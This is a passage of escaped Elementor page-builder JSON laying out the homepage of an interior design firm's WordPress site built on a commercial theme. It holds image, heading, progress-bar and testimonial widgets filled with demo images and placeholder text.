"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is 